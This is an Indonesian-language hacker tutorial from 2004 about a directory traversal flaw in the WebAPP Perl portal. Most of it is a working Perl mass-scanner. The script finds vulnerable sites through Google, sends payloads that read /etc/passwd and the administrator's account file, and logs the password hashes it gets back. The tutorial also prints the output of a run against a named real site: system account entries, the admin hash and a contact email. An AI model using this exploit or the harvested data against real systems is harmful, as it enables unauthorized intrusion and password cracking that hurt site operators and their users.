/********************************************************* * Newest WebAPP bug mass scanner * (fresh release) * * * oleh : iko (iko94@yahoo.com) * www.geocities.com/iko94 * * release : sept,1,2004 * * No Warranty. This tutorial is for educational use only, * commercial use is prohibited. * **********************************************************/ Again, lagi-lagi bug di aplikasi web, huh... WebAPP diperkenalkan sebagai internet's most feature rich, easy to run PERL based portal system. Home site nya di http://www.web-app.org/ dan http://cornerstone.web-app.org/cgi-bin/index.cgi The WebAPP system sendiri memiliki serious reverse directory traversal vulnerability. Contoh : http://www.kingscalendar.com/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00 kemudian lihat html source halaman tersebut, anda akan temukan isi file password dalam bentuk terpisah-pisah. http://www.kingscalendar.com/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 kemudian lihat html source halaman tersebut, anda akan melihat baris : href="index.cgi?action=viewnews&id=adE1/IumoQXiM"> "adE1/IumoQXiM" adalah hashed password dari/milik Administrator, yang memakai standard DES encrypted, jadi anda tinggal menjalankan password cracking program untuk menge-crack nya. Setiap user akan memiliki sebuah file .dat di dalam direktori db/members. Jadi masalahnya sekarang, adakah program DES cracker ? OK, sekarang waktunya melihat listing skrip perl nya. ==================potong di sini======================== #!/usr/bin/perl # use LWP::UserAgent; use HTTP::Message; use URI::Escape; $baner=<new; $ua->timeout(35); $ua->agent("MSIE/6.0 Windows"); $ua->proxy(http => $proxy) if defined($proxy); $browser = LWP::UserAgent->new; $browser -> agent($Agent); $browser->proxy(http => $proxy) if defined($proxy); $counter=0; #Read last session open(hf,$fsav); $lastsav=; close(hf); $check=1;#Check if any save session $nomer=1; while(1) { $gourl = "http://www.google.com/search?q=allinurl:$komponen&num=10&hl=en&lr=&ie=UTF-8&oe=utf-8&start=$counter&sa=N"; $grabresponse = $ua->get($gourl); $counter=$counter+10; if (!($grabresponse->is_success)) { printlog ($grabresponse->status_line. " Failure\n"); } else { $data1 = $grabresponse->as_string; open(lol,">$tempfile"); print lol $data1; close(lol); open(lol,$tempfile) || die("Cannot open the file"); @fh=; close(lol); #$data=join("",@loli); exit if ($data=~/Google does not serve more than 1000/); #End Google search or Stop foreach (@fh) { $hasil=$_=~/\

\/g; $url=$1; if ($hasil) { #print "found = $pass ::: \n";} if (($lastsav ne "") && (!($lastsav =~ /$url/)) && $check) { next; } else { $check=0; } #Save Session open(hf,">$fsav"); print hf $url; close(hf); printlog("$nomer. http://$url$exp1\t"); $nomer++; #GET password ; exp1 $urltarget= "http://$url".$exp1; $urltarget=~s/ /%20/g; print "\nProcessing oi $urltarget.....\n"; $loginpost = $urltarget; $loginrequest = HTTP::Request->new(GET => $loginpost); $loginrequest->referer($urltarget); print "Proses GET sedang berlangsung...\n"; $loginresponse = $browser->request($loginrequest); $logincek = $loginresponse->as_string; if (!($loginresponse->is_success)) { print ("$loginpost Failure\n"); printlog ("Gagal total ".$loginresponse->status_line. " Failure\n"); } else { print ("$loginpost Success\n"); printlog ($loginresponse->status_line. " could be Success\n"); #print "$logincek\n"; $data1 = $loginresponse->as_string; open(lol,">$tempfile"); print lol $data1; close(lol); print "sukses donlod exp1 ...\n"; #exit; open(lol,$tempfile) || die("Cannot open the file"); @loli=; close(lol); foreach (@loli) { $hasil=$_=~/\;id\=(.+?)\"\>/g; $pass=$1; if ($hasil) {printlog ("found = $pass :::\n");$tanda=1;} } #of foreach if (!($tanda==1)) {printlog ("parsing file gak ada hasil... \n");} $tanda=0; } # of else sukses printlog("\n"); #GET admin.dat ; exp2 $urltarget= "http://$url".$exp2; $urltarget=~s/ /%20/g; print "\nProcessing oi $urltarget.....\n"; $loginpost = $urltarget; $loginrequest = HTTP::Request->new(GET => $loginpost); $loginrequest->referer($urltarget); print "Proses GET sedang berlangsung...\n"; $loginresponse = $browser->request($loginrequest); $logincek = $loginresponse->as_string; if (!($loginresponse->is_success)) { print ("$loginpost Failure\n"); printlog ("Gagal total ".$loginresponse->status_line. " Failure\n"); } else { print ("$loginpost Success\n"); printlog ($loginresponse->status_line. " could be Success\n"); #print "$logincek\n"; $data1 = $loginresponse->as_string; open(lol,">$tempfile"); print lol $data1; close(lol); print "sukses donlod exp2 ...\n"; #exit; open(lols,$tempfile) || die("Cannot open the file"); @lolipop=; close(lols); foreach (@lolipop) { $hasil=$_=~/\;id\=(.+?)\"\>/g; $pass=$1; if ($hasil) {printlog ("found = $pass :::\n");$tanda=1;} } #of foreach if (!($tanda==1)) {printlog ("parsing file gak ada hasil... \n");} $tanda=0; } # of else sukses printlog("\n"); } #end of if ($hasil) } #end of foreach } #end of if } #end of while sub printlog { print @_[0]; open(lo,">>$log"); print lo @_[0]; close(lo); return; } ==================potong di sini======================== Simpan dengan nama webapp_google_donlod.pl Sekarang coba jalankan : perl webapp_google_donlod.pl "index.cgi?action=topics" OK, kini lihat sebagian output skrip tersebut : ==================potong di sini======================== 64. http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../../ ../../../../etc/passwd%00 Processing oi http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat =../../../../../../../etc/passwd%00..... Proses GET sedang berlangsung... http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../../../. ./../../etc/passwd%00 Success 200 OK could be Success sukses donlod exp1 ... found = 47" shape="rect" coords="267, 62, 350, 79 ::: found = 52" shape="rect" coords="349, 62, 433, 79 ::: found = 68" shape="rect" coords="432, 62, 516, 79 ::: found = 47" class="menu ::: found = 52" class="menu ::: found = 68" class="menu ::: found = root:*:0:0:Charlie &:/root:/bin/csh ::: found = daemon:*:1:1:daemon:/root:/sbin/nologin ::: found = operator:*:2:5:operator:/:/sbin/nologin ::: found = bin:*:3:7:bin:/:/sbin/nologin ::: found = tty:*:4:65533:tty:/:/sbin/nologin ::: found = kmem:*:5:65533:kmem:/:/sbin/nologin ::: found = games:*:7:13:games:/usr/games:/sbin/nologin ::: found = news:*:8:8:news:/:/sbin/nologin ::: found = man:*:9:9:man:/usr/share/man:/sbin/nologin ::: found = sshd:*:22:22:sshd:/var/empty:/sbin/nologin ::: found = smmsp:*:25:25:smmsp:/var/spool/clientmqueue:/sbin/nologin ::: found = mailnull:*:26:26:mailnull:/var/spool/mqueue:/sbin/nologin ::: found = bind:*:53:53:bind:/:/sbin/nologin ::: found = cyrus:*:60:60:cyrus:/nonexistant:/sbin/nologin ::: found = uucp:*:66:66:uucp:/var/spool/uucppublic:/usr/libexec/uucp/uucico ::: found = xten:*:67:67:xten:/usr/local/xten:/sbin/nologin ::: found = www:*:80:80:www:/nonexistant:/sbin/nologin ::: found = mysql:*:88:88:mysql:/var/db/mysql:/sbin/nologin ::: found = postfix:*:90:90:postfix:/var/spool/postfix:/sbin/nologin ::: found = clamav:*:93:2001:clamav:/dev/null:/sbin/nologin ::: found = powweb:*:100:100:powweb:/powweb:/usr/local/bin/bash ::: found = james:*:101:0:james:/usr/home/james:/usr/local/bin/bash ::: found = andrew:*:102:0:andrew:/usr/home/andrew:/usr/local/bin/bash ::: found = steven:*:103:0:steven:/usr/home/steven:/usr/local/bin/bash ::: found = winnie:*:104:100:winnie:/usr/home/winnie:/usr/local/bin/bash ::: found = 47 ::: found = 52 ::: found = 68 ::: Processing oi http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat =../../db/members/admin.dat%00..... Proses GET sedang berlangsung... http://www.thanhtan.com/cgi-bin/vn/index.cgi?action=topics&viewcat=../../db/memb ers/admin.dat%00 Success 200 OK could be Success sukses donlod exp2 ... found = 47" shape="rect" coords="267, 62, 350, 79 ::: found = 52" shape="rect" coords="349, 62, 433, 79 ::: found = 68" shape="rect" coords="432, 62, 516, 79 ::: found = 47" class="menu ::: found = 52" class="menu ::: found = 68" class="menu ::: found = adniqN/bZkSVw ::: found = Admin ::: found = contact@thanhtan.com ::: found = http://www.thanhtan.com/ ::: found = My generic signature&& ::: found = 5 ::: found = Administrator ::: found = _nopic.gif ::: found = forever ::: found = 38 ::: found = 0 ::: found = standard ::: found = 47 ::: found = 52 ::: found = 68 ::: ==================potong di sini======================== :)) Tidak begitu sempurna memang... Tapi cukuplah untuk memeriksa kelemahan website-website yang memakai WebAPP. Coba anda lihat baris output : found = adniqN/bZkSVw ::: ya itulah hashed password dari/milik Administrator. Anda bisa lihat hasilnya di file log nya. Cukup sekian kiranya... Semoga tulisan ini bisa berguna bagi para pembaca, dan bisa membuka cakrawala pikiran kita tentang dunia keamanan internet. :) REFERENSI : 1. http://packetstorm.widexs.nl/0408-exploits/webapp.traversal.txt 2. ActiveState ActivePerl 5.8 Documentation 3. Bukunya REGEX Steven Haryanto 4. http://www.bosen.net/releases *very very very special greetz to: [+][+][+] my beloved ana [+][+][+] *shout to dhanny firman syah : keep fighting, bro... *special greetz to: [+] www.neoteker.or.id [+] www.echo.or.id [+] www.bosen.net [+] bosen [+] ftp_geo [+] tiong [+] all #1stlink #neoteker #e-c-h-o #batamhacker #kartubeben #antihackerlink crew @ dal net [+] all #1stlink #romance #hackers @ centrin [+] sj, alphacentupret, boeboe, fuzk3 kendi [+] y3d1ps, z3r0byt3, biatch-x *iko berterimakasih kepada: [+] qq [+] tiyox [+] keputih group [+] everyone who shouting the freedom *iko tidak berterimakasih kepada: [-] monopoli [-] birokrasi [-] para penjilat [-] koruptor [-] closed source kirimkan kritik && saran ke iko94@yahoo.com [EOF]